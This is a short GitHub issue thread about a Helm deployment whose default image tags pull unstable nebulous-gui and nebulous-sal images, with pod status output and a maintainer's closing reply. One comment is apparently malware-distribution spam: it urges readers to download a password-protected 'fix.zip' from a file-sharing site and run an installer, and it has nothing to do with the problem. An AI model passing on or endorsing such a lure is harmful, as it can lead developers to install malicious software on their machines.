### ISSUE TITLE
Usage of stable tags

### ISSUE THREAD

**Issue by Iqqdd99** [eu-nebulous/helmfile#1]
The default tags of the nebulous-gui and the nebulous-sal deploy unstable images:

```
NAME                           READY   STATUS                  RESTARTS        AGE
nebulous-gui-d7c8bb7d6-8rtbr   0/1     Init:CrashLoopBackOff   11 (31s ago)    141m
nebulous-sal-bf66c55f8-jmjlp   1/2     Running                 4 (3m25s ago)   141m
```

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/jjwb2y99al0750x/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yoctozepto** [comment]
Apologies for closing this so late. It has been fixed in the meantime by having the `r1` branch.
